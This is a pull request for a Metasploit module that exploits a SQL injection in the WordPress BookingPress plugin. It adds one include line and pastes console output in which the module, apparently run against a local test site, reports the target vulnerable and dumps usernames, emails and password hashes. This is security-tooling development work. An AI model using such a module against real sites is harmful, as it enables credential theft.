### PR TITLE
BookingPress module fix

### DIFF
--- a/modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
+++ b/modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb
@@ -4,6 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Scanner
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::SQLi
   prepend Msf::Exploit::Remote::AutoCheck


### PR DESCRIPTION
Only after posting this PR did I realize that this is an issue with interpreting `localhost` as `127.0.0.1` and not an issue with this module specifically. We might not want to merge this PR. I'll create an issue describing what's happening here

Before RHOSTS = localhost
```
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
[*] Running module against 0.0.0.1

[*] Running automatic check ("set AutoCheck false" to disable)
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Unable to get wp-nonce as an unauthenticated user "set ForceExploit true" to override check result.
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
Wordpress User Credentials
==========================

 Username       Email                         Hash
 --------       -----                         ----
 admin          admin@admin.com               $P$BfxUckldN6AiHPD0BK6jg58se2b.aL.
 hackerman      hackerman@hacktheworld.io     $P$BESfz7bqSOY8VkUfuYXAZ/bT5E36ww/
 mr_metasploit  mr_metasploit@metaslpoit.org  $P$BDb8pIfym5dS6WTnNU8vU5Uk6i89fk.
 msfuser        msfuser@rapid7.com            $P$BpITVDPiqOZ7fyQbI5g9rsgUvZQFBd1
 todd           todd@toddtown.com             $P$BnlpkVgxGFWnmvdDQ3JStgpIx8LMFj0

[*] Auxiliary module execution completed
```
Before RHOSTS = 127.0.0.1
```
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
[*] Running module against 127.0.0.1

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information
Wordpress User Credentials
==========================

 Username       Email                         Hash
 --------       -----                         ----
 admin          admin@admin.com               $P$BfxUckldN6AiHPD0BK6jg58se2b.aL.
 hackerman      hackerman@hacktheworld.io     $P$BESfz7bqSOY8VkUfuYXAZ/bT5E36ww/
 mr_metasploit  mr_metasploit@metaslpoit.org  $P$BDb8pIfym5dS6WTnNU8vU5Uk6i89fk.
 msfuser        msfuser@rapid7.com            $P$BpITVDPiqOZ7fyQbI5g9rsgUvZQFBd1
 todd           todd@toddtown.com             $P$BnlpkVgxGFWnmvdDQ3JStgpIx8LMFj0

[*] Auxiliary module execution completed
```
After including `Msf::Auxiliary::Scanner` RHOSTS can be set to either localhost or 127.0.0.1 and there's no issue running the module.